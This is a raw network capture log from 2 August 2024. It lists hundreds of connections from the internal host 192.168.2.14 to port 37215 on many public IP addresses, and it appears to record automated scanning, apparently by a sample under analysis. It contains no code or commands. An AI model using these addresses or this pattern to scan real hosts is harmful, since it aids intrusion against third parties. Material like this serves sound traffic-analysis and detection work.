                                                                      Aug 2, 2024 13:16:55.185061932 CEST2402737215192.168.2.14197.79.34.119
                                                                      Aug 2, 2024 13:16:55.185079098 CEST2402737215192.168.2.14102.220.100.209
                                                                      Aug 2, 2024 13:16:55.185079098 CEST2402737215192.168.2.14156.13.250.27
                                                                      Aug 2, 2024 13:16:55.185129881 CEST2402737215192.168.2.14156.130.100.221
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.14156.13.91.103
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.1441.202.23.6
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.14102.100.114.101
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.14156.187.137.97
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.14102.166.117.238
                                                                      Aug 2, 2024 13:16:55.185167074 CEST2402737215192.168.2.14102.253.74.162
                                                                      Aug 2, 2024 13:16:55.185165882 CEST2402737215192.168.2.14156.218.143.125
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.1441.199.133.161
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.1441.196.162.209
                                                                      Aug 2, 2024 13:16:55.185163021 CEST2402737215192.168.2.14102.8.28.113
                                                                      Aug 2, 2024 13:16:55.185165882 CEST2402737215192.168.2.1441.178.168.122
                                                                      Aug 2, 2024 13:16:55.185174942 CEST2402737215192.168.2.14197.216.246.201
                                                                      Aug 2, 2024 13:16:55.185251951 CEST2402737215192.168.2.14156.151.109.91
                                                                      Aug 2, 2024 13:16:55.185251951 CEST2402737215192.168.2.14156.69.176.166
                                                                      Aug 2, 2024 13:16:55.185251951 CEST2402737215192.168.2.14197.127.108.116
                                                                      Aug 2, 2024 13:16:55.185255051 CEST2402737215192.168.2.14197.55.33.202
                                                                      Aug 2, 2024 13:16:55.185255051 CEST2402737215192.168.2.14102.159.161.62
                                                                      Aug 2, 2024 13:16:55.185256004 CEST2402737215192.168.2.14102.136.131.82
                                                                      Aug 2, 2024 13:16:55.185255051 CEST2402737215192.168.2.1441.41.128.62
                                                                      Aug 2, 2024 13:16:55.185256004 CEST2402737215192.168.2.14197.205.7.26
                                                                      Aug 2, 2024 13:16:55.185259104 CEST2402737215192.168.2.14156.90.252.134
                                                                      Aug 2, 2024 13:16:55.185260057 CEST2402737215192.168.2.14156.238.220.24
                                                                      Aug 2, 2024 13:16:55.185255051 CEST2402737215192.168.2.14197.67.37.87
                                                                      Aug 2, 2024 13:16:55.185259104 CEST2402737215192.168.2.1441.28.77.32
                                                                      Aug 2, 2024 13:16:55.185295105 CEST2402737215192.168.2.14197.63.192.210
                                                                      Aug 2, 2024 13:16:55.185301065 CEST2402737215192.168.2.14156.234.81.219
                                                                      Aug 2, 2024 13:16:55.185324907 CEST2402737215192.168.2.14156.164.134.236
                                                                      Aug 2, 2024 13:16:55.185324907 CEST2402737215192.168.2.14197.3.179.169
                                                                      Aug 2, 2024 13:16:55.185324907 CEST2402737215192.168.2.14197.60.234.148
                                                                      Aug 2, 2024 13:16:55.185324907 CEST2402737215192.168.2.14156.180.79.46
                                                                      Aug 2, 2024 13:16:55.185324907 CEST2402737215192.168.2.14156.162.66.190
                                                                      Aug 2, 2024 13:16:55.185348988 CEST2402737215192.168.2.1441.17.90.78
                                                                      Aug 2, 2024 13:16:55.185348988 CEST2402737215192.168.2.14197.84.231.1
                                                                      Aug 2, 2024 13:16:55.185348988 CEST2402737215192.168.2.14197.2.159.85
                                                                      Aug 2, 2024 13:16:55.185403109 CEST2402737215192.168.2.14197.221.53.123
                                                                      Aug 2, 2024 13:16:55.185403109 CEST2402737215192.168.2.14102.75.50.161
                                                                      Aug 2, 2024 13:16:55.185403109 CEST2402737215192.168.2.14197.133.177.92
                                                                      Aug 2, 2024 13:16:55.185403109 CEST2402737215192.168.2.14197.127.47.102
                                                                      Aug 2, 2024 13:16:55.185403109 CEST2402737215192.168.2.14197.238.65.94
                                                                      Aug 2, 2024 13:16:55.185403109 CEST2402737215192.168.2.1441.8.45.53
                                                                      Aug 2, 2024 13:16:55.185409069 CEST2402737215192.168.2.14197.158.133.205
                                                                      Aug 2, 2024 13:16:55.185409069 CEST2402737215192.168.2.14197.61.180.58
                                                                      Aug 2, 2024 13:16:55.185410023 CEST2402737215192.168.2.14197.124.188.94
                                                                      Aug 2, 2024 13:16:55.185409069 CEST2402737215192.168.2.1441.67.81.171
                                                                      Aug 2, 2024 13:16:55.185409069 CEST2402737215192.168.2.1441.175.180.178
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14156.115.165.20
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14156.232.200.241
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14197.84.124.235
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14102.76.139.12
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14156.225.9.155
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14102.49.254.91
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.1441.218.235.75
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.1441.83.92.93
                                                                      Aug 2, 2024 13:16:55.185414076 CEST2402737215192.168.2.1441.158.137.190
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14156.103.220.11
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.1441.47.157.67
                                                                      Aug 2, 2024 13:16:55.185414076 CEST2402737215192.168.2.14102.124.218.198
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.14156.213.141.74
                                                                      Aug 2, 2024 13:16:55.185414076 CEST2402737215192.168.2.14197.112.15.59
                                                                      Aug 2, 2024 13:16:55.185410976 CEST2402737215192.168.2.1441.57.176.55
                                                                      Aug 2, 2024 13:16:55.185411930 CEST2402737215192.168.2.14102.209.200.187
                                                                      Aug 2, 2024 13:16:55.185411930 CEST2402737215192.168.2.14156.76.125.167
                                                                      Aug 2, 2024 13:16:55.185472012 CEST2402737215192.168.2.14156.173.2.17
                                                                      Aug 2, 2024 13:16:55.185520887 CEST2402737215192.168.2.1441.56.54.178
                                                                      Aug 2, 2024 13:16:55.185522079 CEST2402737215192.168.2.14156.67.109.193
                                                                      Aug 2, 2024 13:16:55.185528994 CEST2402737215192.168.2.14102.239.245.51
                                                                      Aug 2, 2024 13:16:55.185528994 CEST2402737215192.168.2.14102.255.33.208
                                                                      Aug 2, 2024 13:16:55.185528994 CEST2402737215192.168.2.1441.101.8.26
                                                                      Aug 2, 2024 13:16:55.185528994 CEST2402737215192.168.2.14156.103.92.10
                                                                      Aug 2, 2024 13:16:55.185528994 CEST2402737215192.168.2.14156.35.6.172
                                                                      Aug 2, 2024 13:16:55.185528994 CEST2402737215192.168.2.14156.11.195.9
                                                                      Aug 2, 2024 13:16:55.185528994 CEST2402737215192.168.2.1441.24.149.253
                                                                      Aug 2, 2024 13:16:55.185532093 CEST2402737215192.168.2.14102.25.117.37
                                                                      Aug 2, 2024 13:16:55.185583115 CEST2402737215192.168.2.14156.90.212.116
                                                                      Aug 2, 2024 13:16:55.185584068 CEST2402737215192.168.2.14102.87.176.148
                                                                      Aug 2, 2024 13:16:55.185584068 CEST2402737215192.168.2.14102.192.167.69
                                                                      Aug 2, 2024 13:16:55.185591936 CEST2402737215192.168.2.14156.34.56.55
                                                                      Aug 2, 2024 13:16:55.185591936 CEST2402737215192.168.2.14156.16.91.202
                                                                      Aug 2, 2024 13:16:55.185592890 CEST2402737215192.168.2.14197.86.245.108
                                                                      Aug 2, 2024 13:16:55.185607910 CEST2402737215192.168.2.14156.219.149.193
                                                                      Aug 2, 2024 13:16:55.185607910 CEST2402737215192.168.2.14197.37.71.66
                                                                      Aug 2, 2024 13:16:55.185607910 CEST2402737215192.168.2.1441.79.4.107
                                                                      Aug 2, 2024 13:16:55.185607910 CEST2402737215192.168.2.14102.67.158.140
                                                                      Aug 2, 2024 13:16:55.185623884 CEST2402737215192.168.2.14102.82.134.230
                                                                      Aug 2, 2024 13:16:55.185626030 CEST2402737215192.168.2.14102.136.167.245
                                                                      Aug 2, 2024 13:16:55.185626984 CEST2402737215192.168.2.14156.72.239.135
                                                                      Aug 2, 2024 13:16:55.185626984 CEST2402737215192.168.2.14156.184.168.247
                                                                      Aug 2, 2024 13:16:55.185672998 CEST2402737215192.168.2.14197.77.116.68
                                                                      Aug 2, 2024 13:16:55.185672998 CEST2402737215192.168.2.14102.66.44.52
                                                                      Aug 2, 2024 13:16:55.185692072 CEST2402737215192.168.2.1441.144.127.244
                                                                      Aug 2, 2024 13:16:55.185703993 CEST2402737215192.168.2.1441.231.21.59
                                                                      Aug 2, 2024 13:16:55.185703993 CEST2402737215192.168.2.1441.10.101.123
                                                                      Aug 2, 2024 13:16:55.185708046 CEST2402737215192.168.2.1441.224.98.140
                                                                      Aug 2, 2024 13:16:55.185709000 CEST2402737215192.168.2.14197.28.147.190
                                                                      Aug 2, 2024 13:16:55.185709000 CEST2402737215192.168.2.1441.99.18.225
                                                                      Aug 2, 2024 13:16:55.185723066 CEST2402737215192.168.2.1441.32.255.244
                                                                      Aug 2, 2024 13:16:55.185723066 CEST2402737215192.168.2.14102.242.66.6
                                                                      Aug 2, 2024 13:16:55.185723066 CEST2402737215192.168.2.1441.172.115.178
                                                                      Aug 2, 2024 13:16:55.185723066 CEST2402737215192.168.2.14102.211.221.97
                                                                      Aug 2, 2024 13:16:55.185750008 CEST2402737215192.168.2.1441.191.100.62
                                                                      Aug 2, 2024 13:16:55.185753107 CEST2402737215192.168.2.1441.68.18.241
                                                                      Aug 2, 2024 13:16:55.185755014 CEST2402737215192.168.2.14156.214.200.37
                                                                      Aug 2, 2024 13:16:55.185781956 CEST2402737215192.168.2.14156.184.95.183
                                                                      Aug 2, 2024 13:16:55.185781956 CEST2402737215192.168.2.14197.254.24.231
                                                                      Aug 2, 2024 13:16:55.185796022 CEST2402737215192.168.2.1441.239.40.243
                                                                      Aug 2, 2024 13:16:55.185820103 CEST2402737215192.168.2.14102.231.17.22
                                                                      Aug 2, 2024 13:16:55.185820103 CEST2402737215192.168.2.1441.29.164.70
                                                                      Aug 2, 2024 13:16:55.185830116 CEST2402737215192.168.2.14156.64.14.149
                                                                      Aug 2, 2024 13:16:55.185830116 CEST2402737215192.168.2.1441.213.21.134
                                                                      Aug 2, 2024 13:16:55.185832024 CEST2402737215192.168.2.14197.128.130.234
                                                                      Aug 2, 2024 13:16:55.185837984 CEST2402737215192.168.2.1441.253.58.104
                                                                      Aug 2, 2024 13:16:55.185837984 CEST2402737215192.168.2.1441.104.99.79
                                                                      Aug 2, 2024 13:16:55.185853958 CEST2402737215192.168.2.14197.198.164.28
                                                                      Aug 2, 2024 13:16:55.185884953 CEST2402737215192.168.2.1441.12.27.180
                                                                      Aug 2, 2024 13:16:55.185904026 CEST2402737215192.168.2.14156.154.129.142
                                                                      Aug 2, 2024 13:16:55.185904026 CEST2402737215192.168.2.14102.76.124.226
                                                                      Aug 2, 2024 13:16:55.185905933 CEST2402737215192.168.2.14197.130.73.149
                                                                      Aug 2, 2024 13:16:55.185908079 CEST2402737215192.168.2.14156.201.166.101
                                                                      Aug 2, 2024 13:16:55.185925961 CEST2402737215192.168.2.14102.61.131.104
                                                                      Aug 2, 2024 13:16:55.185956001 CEST2402737215192.168.2.14156.118.66.30
                                                                      Aug 2, 2024 13:16:55.185961008 CEST2402737215192.168.2.14197.187.167.153
                                                                      Aug 2, 2024 13:16:55.185985088 CEST2402737215192.168.2.14197.21.202.133
                                                                      Aug 2, 2024 13:16:55.186008930 CEST2402737215192.168.2.14102.162.151.37
                                                                      Aug 2, 2024 13:16:55.186008930 CEST2402737215192.168.2.14102.244.247.205
                                                                      Aug 2, 2024 13:16:55.186028004 CEST2402737215192.168.2.1441.247.124.218
                                                                      Aug 2, 2024 13:16:55.186028004 CEST2402737215192.168.2.14197.30.228.194
                                                                      Aug 2, 2024 13:16:55.186038017 CEST2402737215192.168.2.14102.128.49.58
                                                                      Aug 2, 2024 13:16:55.186062098 CEST2402737215192.168.2.1441.144.7.209
                                                                      Aug 2, 2024 13:16:55.186148882 CEST2402737215192.168.2.14102.220.222.153
                                                                      Aug 2, 2024 13:16:55.186148882 CEST2402737215192.168.2.14102.140.40.2
                                                                      Aug 2, 2024 13:16:55.186148882 CEST2402737215192.168.2.14156.45.25.216
                                                                      Aug 2, 2024 13:16:55.186148882 CEST2402737215192.168.2.14156.163.191.57
                                                                      Aug 2, 2024 13:16:55.186148882 CEST2402737215192.168.2.14156.4.238.248
                                                                      Aug 2, 2024 13:16:55.186161041 CEST2402737215192.168.2.14197.88.237.193
                                                                      Aug 2, 2024 13:16:55.186161041 CEST2402737215192.168.2.1441.33.201.105
                                                                      Aug 2, 2024 13:16:55.186161041 CEST2402737215192.168.2.14197.108.3.63
                                                                      Aug 2, 2024 13:16:55.186161041 CEST2402737215192.168.2.14102.177.212.252
                                                                      Aug 2, 2024 13:16:55.186183929 CEST2402737215192.168.2.14156.152.228.91
                                                                      Aug 2, 2024 13:16:55.186202049 CEST2402737215192.168.2.14102.10.215.217
                                                                      Aug 2, 2024 13:16:55.186202049 CEST2402737215192.168.2.14197.219.68.81
                                                                      Aug 2, 2024 13:16:55.186202049 CEST2402737215192.168.2.1441.100.157.221
                                                                      Aug 2, 2024 13:16:55.186202049 CEST2402737215192.168.2.1441.28.137.246
                                                                      Aug 2, 2024 13:16:55.186206102 CEST2402737215192.168.2.1441.61.135.50
                                                                      Aug 2, 2024 13:16:55.186206102 CEST2402737215192.168.2.14156.136.52.61
                                                                      Aug 2, 2024 13:16:55.186206102 CEST2402737215192.168.2.14156.162.23.30
                                                                      Aug 2, 2024 13:16:55.186207056 CEST2402737215192.168.2.1441.171.31.182
                                                                      Aug 2, 2024 13:16:55.186207056 CEST2402737215192.168.2.14102.181.44.109
                                                                      Aug 2, 2024 13:16:55.186206102 CEST2402737215192.168.2.14102.172.134.207
                                                                      Aug 2, 2024 13:16:55.186207056 CEST2402737215192.168.2.14102.187.157.218
                                                                      Aug 2, 2024 13:16:55.186206102 CEST2402737215192.168.2.14156.251.73.12
                                                                      Aug 2, 2024 13:16:55.186207056 CEST2402737215192.168.2.14197.118.245.225
                                                                      Aug 2, 2024 13:16:55.186206102 CEST2402737215192.168.2.14156.51.187.188
                                                                      Aug 2, 2024 13:16:55.186207056 CEST2402737215192.168.2.14197.61.179.213
                                                                      Aug 2, 2024 13:16:55.186207056 CEST2402737215192.168.2.14102.107.240.154
                                                                      Aug 2, 2024 13:16:55.186207056 CEST2402737215192.168.2.1441.51.172.235
                                                                      Aug 2, 2024 13:16:55.186216116 CEST2402737215192.168.2.1441.60.39.86
                                                                      Aug 2, 2024 13:16:55.186275005 CEST2402737215192.168.2.14197.129.200.63
                                                                      Aug 2, 2024 13:16:55.186275005 CEST2402737215192.168.2.1441.201.29.24
                                                                      Aug 2, 2024 13:16:55.186320066 CEST2402737215192.168.2.14197.176.24.34
                                                                      Aug 2, 2024 13:16:55.186320066 CEST2402737215192.168.2.14197.54.87.197
                                                                      Aug 2, 2024 13:16:55.186320066 CEST2402737215192.168.2.14156.59.106.177
                                                                      Aug 2, 2024 13:16:55.186320066 CEST2402737215192.168.2.14156.208.169.30
                                                                      Aug 2, 2024 13:16:55.186320066 CEST2402737215192.168.2.14197.19.106.114
                                                                      Aug 2, 2024 13:16:55.186320066 CEST2402737215192.168.2.14102.139.127.29
                                                                      Aug 2, 2024 13:16:55.186320066 CEST2402737215192.168.2.14197.193.1.242
                                                                      Aug 2, 2024 13:16:55.186330080 CEST2402737215192.168.2.1441.187.116.205
                                                                      Aug 2, 2024 13:16:55.186330080 CEST2402737215192.168.2.14156.8.211.64
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.14197.80.157.73
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.14102.207.220.176
                                                                      Aug 2, 2024 13:16:55.186330080 CEST2402737215192.168.2.1441.178.122.173
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.14156.254.47.236
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.1441.59.215.136
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.14102.94.25.156
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.14197.88.33.212
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.14156.20.215.26
                                                                      Aug 2, 2024 13:16:55.186331987 CEST2402737215192.168.2.14102.46.227.44
                                                                      Aug 2, 2024 13:16:55.186336040 CEST2402737215192.168.2.1441.216.140.74
                                                                      Aug 2, 2024 13:16:55.186336040 CEST2402737215192.168.2.14102.73.132.226
                                                                      Aug 2, 2024 13:16:55.186336040 CEST2402737215192.168.2.14102.62.100.242
                                                                      Aug 2, 2024 13:16:55.186355114 CEST2402737215192.168.2.14102.122.152.126
                                                                      Aug 2, 2024 13:16:55.186355114 CEST2402737215192.168.2.14197.9.103.153
                                                                      Aug 2, 2024 13:16:55.186355114 CEST2402737215192.168.2.1441.123.38.168
                                                                      Aug 2, 2024 13:16:55.186355114 CEST2402737215192.168.2.14156.112.90.176
                                                                      Aug 2, 2024 13:16:55.186355114 CEST2402737215192.168.2.14102.250.199.29
                                                                      Aug 2, 2024 13:16:55.186355114 CEST2402737215192.168.2.1441.73.127.98
                                                                      Aug 2, 2024 13:16:55.186355114 CEST2402737215192.168.2.14197.217.41.23
                                                                      Aug 2, 2024 13:16:55.186402082 CEST2402737215192.168.2.14102.144.6.91
                                                                      Aug 2, 2024 13:16:55.186402082 CEST2402737215192.168.2.14102.52.116.237
                                                                      Aug 2, 2024 13:16:55.186402082 CEST2402737215192.168.2.14156.67.253.152
                                                                      Aug 2, 2024 13:16:55.186402082 CEST2402737215192.168.2.14102.161.140.127
                                                                      Aug 2, 2024 13:16:55.186402082 CEST2402737215192.168.2.14156.221.47.106
                                                                      Aug 2, 2024 13:16:55.186402082 CEST2402737215192.168.2.14197.39.212.119
                                                                      Aug 2, 2024 13:16:55.186441898 CEST2402737215192.168.2.14197.76.125.26
                                                                      Aug 2, 2024 13:16:55.186441898 CEST2402737215192.168.2.1441.247.90.204
                                                                      Aug 2, 2024 13:16:55.186441898 CEST2402737215192.168.2.14197.230.91.225
                                                                      Aug 2, 2024 13:16:55.186441898 CEST2402737215192.168.2.14197.0.84.235
                                                                      Aug 2, 2024 13:16:55.186441898 CEST2402737215192.168.2.14197.89.27.233
                                                                      Aug 2, 2024 13:16:55.186450958 CEST2402737215192.168.2.14197.157.222.244
                                                                      Aug 2, 2024 13:16:55.186450958 CEST2402737215192.168.2.14156.11.119.169
                                                                      Aug 2, 2024 13:16:55.186450958 CEST2402737215192.168.2.14156.44.109.234
                                                                      Aug 2, 2024 13:16:55.186450958 CEST2402737215192.168.2.14102.173.250.231
                                                                      Aug 2, 2024 13:16:55.186453104 CEST2402737215192.168.2.14156.145.96.43
                                                                      Aug 2, 2024 13:16:55.186454058 CEST2402737215192.168.2.14197.40.162.208
                                                                      Aug 2, 2024 13:16:55.186454058 CEST2402737215192.168.2.14156.81.72.168
                                                                      Aug 2, 2024 13:16:55.186454058 CEST2402737215192.168.2.14197.227.84.30
                                                                      Aug 2, 2024 13:16:55.186454058 CEST2402737215192.168.2.14197.115.210.124
                                                                      Aug 2, 2024 13:16:55.186454058 CEST2402737215192.168.2.14156.97.85.92
                                                                      Aug 2, 2024 13:16:55.186454058 CEST2402737215192.168.2.14156.173.242.245
                                                                      Aug 2, 2024 13:16:55.186458111 CEST2402737215192.168.2.14102.160.127.53
                                                                      Aug 2, 2024 13:16:55.186458111 CEST2402737215192.168.2.1441.228.129.190
                                                                      Aug 2, 2024 13:16:55.186458111 CEST2402737215192.168.2.1441.177.110.147
                                                                      Aug 2, 2024 13:16:55.186458111 CEST2402737215192.168.2.1441.194.72.23
                                                                      Aug 2, 2024 13:16:55.186477900 CEST2402737215192.168.2.14156.114.4.107
                                                                      Aug 2, 2024 13:16:55.186547995 CEST2402737215192.168.2.14102.56.67.147
                                                                      Aug 2, 2024 13:16:55.186547995 CEST2402737215192.168.2.14102.198.243.27
                                                                      Aug 2, 2024 13:16:55.186547995 CEST2402737215192.168.2.14156.83.195.125
                                                                      Aug 2, 2024 13:16:55.186548948 CEST2402737215192.168.2.14197.74.140.21
                                                                      Aug 2, 2024 13:16:55.186547995 CEST2402737215192.168.2.14102.118.42.69
                                                                      Aug 2, 2024 13:16:55.186547995 CEST2402737215192.168.2.14102.22.168.93
                                                                      Aug 2, 2024 13:16:55.186547995 CEST2402737215192.168.2.14197.61.9.102
                                                                      Aug 2, 2024 13:16:55.186548948 CEST2402737215192.168.2.14156.116.248.23
                                                                      Aug 2, 2024 13:16:55.186547995 CEST2402737215192.168.2.14102.142.94.187
                                                                      Aug 2, 2024 13:16:55.186548948 CEST2402737215192.168.2.1441.188.115.119
                                                                      Aug 2, 2024 13:16:55.186553955 CEST2402737215192.168.2.1441.210.132.27
                                                                      Aug 2, 2024 13:16:55.186553955 CEST2402737215192.168.2.14197.97.151.111
                                                                      Aug 2, 2024 13:16:55.186553955 CEST2402737215192.168.2.14102.179.89.103
                                                                      Aug 2, 2024 13:16:55.186553955 CEST2402737215192.168.2.14102.10.58.39
                                                                      Aug 2, 2024 13:16:55.186557055 CEST2402737215192.168.2.14156.253.53.1
                                                                      Aug 2, 2024 13:16:55.186568975 CEST2402737215192.168.2.14156.178.64.47
                                                                      Aug 2, 2024 13:16:55.186568975 CEST2402737215192.168.2.14197.161.92.241
                                                                      Aug 2, 2024 13:16:55.186568975 CEST2402737215192.168.2.14197.83.147.130
                                                                      Aug 2, 2024 13:16:55.186570883 CEST2402737215192.168.2.14156.19.67.11
                                                                      Aug 2, 2024 13:16:55.186570883 CEST2402737215192.168.2.14156.96.80.155
                                                                      Aug 2, 2024 13:16:55.186573029 CEST2402737215192.168.2.1441.21.69.202
                                                                      Aug 2, 2024 13:16:55.186573029 CEST2402737215192.168.2.14197.243.134.73
                                                                      Aug 2, 2024 13:16:55.186573029 CEST2402737215192.168.2.14156.197.186.195
                                                                      Aug 2, 2024 13:16:55.186573029 CEST2402737215192.168.2.14197.200.65.16
                                                                      Aug 2, 2024 13:16:55.186613083 CEST2402737215192.168.2.1441.126.254.44
                                                                      Aug 2, 2024 13:16:55.186614037 CEST2402737215192.168.2.14102.29.69.249
                                                                      Aug 2, 2024 13:16:55.186614037 CEST2402737215192.168.2.14197.241.250.40
                                                                      Aug 2, 2024 13:16:55.186614037 CEST2402737215192.168.2.14156.7.18.174
                                                                      Aug 2, 2024 13:16:55.186614037 CEST2402737215192.168.2.14102.95.88.129
                                                                      Aug 2, 2024 13:16:55.186614037 CEST2402737215192.168.2.1441.231.74.193
                                                                      Aug 2, 2024 13:16:55.186614037 CEST2402737215192.168.2.14156.246.10.89
                                                                      Aug 2, 2024 13:16:55.186614037 CEST2402737215192.168.2.14102.64.66.86
                                                                      Aug 2, 2024 13:16:55.186630964 CEST2402737215192.168.2.1441.228.141.56
                                                                      Aug 2, 2024 13:16:55.186630964 CEST2402737215192.168.2.1441.113.171.72
                                                                      Aug 2, 2024 13:16:55.186665058 CEST2402737215192.168.2.14197.115.228.43
                                                                      Aug 2, 2024 13:16:55.186665058 CEST2402737215192.168.2.14102.76.143.10
                                                                      Aug 2, 2024 13:16:55.186665058 CEST2402737215192.168.2.1441.28.50.146
                                                                      Aug 2, 2024 13:16:55.186665058 CEST2402737215192.168.2.14102.247.122.240
                                                                      Aug 2, 2024 13:16:55.186697960 CEST2402737215192.168.2.1441.8.218.106
                                                                      Aug 2, 2024 13:16:55.186697960 CEST2402737215192.168.2.14197.155.138.14
                                                                      Aug 2, 2024 13:16:55.186697960 CEST2402737215192.168.2.14102.95.95.145
                                                                      Aug 2, 2024 13:16:55.186697960 CEST2402737215192.168.2.14102.220.73.33
                                                                      Aug 2, 2024 13:16:55.186723948 CEST2402737215192.168.2.14197.25.181.107
                                                                      Aug 2, 2024 13:16:55.186723948 CEST2402737215192.168.2.1441.156.153.138
                                                                      Aug 2, 2024 13:16:55.186752081 CEST2402737215192.168.2.14156.135.80.193
                                                                      Aug 2, 2024 13:16:55.186777115 CEST2402737215192.168.2.1441.164.210.63
                                                                      Aug 2, 2024 13:16:55.186777115 CEST2402737215192.168.2.14197.255.11.166
                                                                      Aug 2, 2024 13:16:55.186789036 CEST2402737215192.168.2.1441.57.194.154
                                                                      Aug 2, 2024 13:16:55.186789989 CEST2402737215192.168.2.14102.33.130.93
                                                                      Aug 2, 2024 13:16:55.186789989 CEST2402737215192.168.2.14156.150.169.148
                                                                      Aug 2, 2024 13:16:55.186789989 CEST2402737215192.168.2.1441.32.248.158
                                                                      Aug 2, 2024 13:16:55.186791897 CEST2402737215192.168.2.1441.228.51.63
                                                                      Aug 2, 2024 13:16:55.186804056 CEST2402737215192.168.2.14102.228.77.199
                                                                      Aug 2, 2024 13:16:55.186804056 CEST2402737215192.168.2.1441.64.41.112
                                                                      Aug 2, 2024 13:16:55.186836958 CEST2402737215192.168.2.14102.133.56.205
                                                                      Aug 2, 2024 13:16:55.186836958 CEST2402737215192.168.2.14197.82.81.153
                                                                      Aug 2, 2024 13:16:55.186836958 CEST2402737215192.168.2.14102.216.162.84
                                                                      Aug 2, 2024 13:16:55.186836958 CEST2402737215192.168.2.1441.9.72.154
                                                                      Aug 2, 2024 13:16:55.186840057 CEST2402737215192.168.2.14156.236.212.36
                                                                      Aug 2, 2024 13:16:55.186877012 CEST2402737215192.168.2.1441.6.13.92
                                                                      Aug 2, 2024 13:16:55.186880112 CEST2402737215192.168.2.1441.118.178.145
                                                                      Aug 2, 2024 13:16:55.186880112 CEST2402737215192.168.2.14197.77.222.181
                                                                      Aug 2, 2024 13:16:55.186891079 CEST2402737215192.168.2.1441.82.38.145
                                                                      Aug 2, 2024 13:16:55.186920881 CEST2402737215192.168.2.14102.34.69.184
                                                                      Aug 2, 2024 13:16:55.186928034 CEST2402737215192.168.2.14197.8.14.2
                                                                      Aug 2, 2024 13:16:55.186928988 CEST2402737215192.168.2.14197.224.209.42
                                                                      Aug 2, 2024 13:16:55.186930895 CEST2402737215192.168.2.14102.196.55.53
                                                                      Aug 2, 2024 13:16:55.186930895 CEST2402737215192.168.2.14197.154.52.69
                                                                      Aug 2, 2024 13:16:55.186932087 CEST2402737215192.168.2.14197.39.223.43
                                                                      Aug 2, 2024 13:16:55.186932087 CEST2402737215192.168.2.14156.154.58.40
                                                                      Aug 2, 2024 13:16:55.186933041 CEST2402737215192.168.2.14102.79.99.25
                                                                      Aug 2, 2024 13:16:55.186933041 CEST2402737215192.168.2.14197.20.92.198
                                                                      Aug 2, 2024 13:16:55.186943054 CEST2402737215192.168.2.1441.89.177.126
                                                                      Aug 2, 2024 13:16:55.186943054 CEST2402737215192.168.2.14102.114.61.69
                                                                      Aug 2, 2024 13:16:55.186944008 CEST2402737215192.168.2.14102.229.157.71
                                                                      Aug 2, 2024 13:16:55.186944008 CEST2402737215192.168.2.14197.181.56.21
                                                                      Aug 2, 2024 13:16:55.186963081 CEST2402737215192.168.2.1441.45.22.134
                                                                      Aug 2, 2024 13:16:55.186963081 CEST2402737215192.168.2.1441.101.233.63
                                                                      Aug 2, 2024 13:16:55.186963081 CEST2402737215192.168.2.14156.133.253.131
                                                                      Aug 2, 2024 13:16:55.186965942 CEST2402737215192.168.2.1441.130.111.88
                                                                      Aug 2, 2024 13:16:55.186975002 CEST2402737215192.168.2.14102.54.226.105
                                                                      Aug 2, 2024 13:16:55.186979055 CEST2402737215192.168.2.14102.52.189.201
                                                                      Aug 2, 2024 13:16:55.186980009 CEST2402737215192.168.2.14156.58.247.141
                                                                      Aug 2, 2024 13:16:55.186979055 CEST2402737215192.168.2.14102.191.123.98
                                                                      Aug 2, 2024 13:16:55.186981916 CEST2402737215192.168.2.1441.139.86.182
                                                                      Aug 2, 2024 13:16:55.186981916 CEST2402737215192.168.2.14102.201.123.152
                                                                      Aug 2, 2024 13:16:55.186981916 CEST2402737215192.168.2.14156.165.151.208
                                                                      Aug 2, 2024 13:16:55.187009096 CEST2402737215192.168.2.14156.215.83.39
                                                                      Aug 2, 2024 13:16:55.187011003 CEST2402737215192.168.2.14156.69.16.197
                                                                      Aug 2, 2024 13:16:55.187011003 CEST2402737215192.168.2.14102.10.115.86
                                                                      Aug 2, 2024 13:16:55.187016964 CEST2402737215192.168.2.14102.190.131.14
                                                                      Aug 2, 2024 13:16:55.187055111 CEST2402737215192.168.2.14197.42.111.119
                                                                      Aug 2, 2024 13:16:55.187057972 CEST2402737215192.168.2.14102.61.36.6
                                                                      Aug 2, 2024 13:16:55.187057972 CEST2402737215192.168.2.14197.5.89.145
                                                                      Aug 2, 2024 13:16:55.187077045 CEST2402737215192.168.2.14197.32.146.17
                                                                      Aug 2, 2024 13:16:55.187077045 CEST2402737215192.168.2.14197.221.24.11
                                                                      Aug 2, 2024 13:16:55.187077045 CEST2402737215192.168.2.1441.245.97.4
                                                                      Aug 2, 2024 13:16:55.187094927 CEST2402737215192.168.2.14197.222.211.219
                                                                      Aug 2, 2024 13:16:55.187094927 CEST2402737215192.168.2.14102.195.108.184
                                                                      Aug 2, 2024 13:16:55.187096119 CEST2402737215192.168.2.14102.73.2.76
                                                                      Aug 2, 2024 13:16:55.187096119 CEST2402737215192.168.2.14102.103.232.21
                                                                      Aug 2, 2024 13:16:55.187097073 CEST2402737215192.168.2.14156.157.179.238
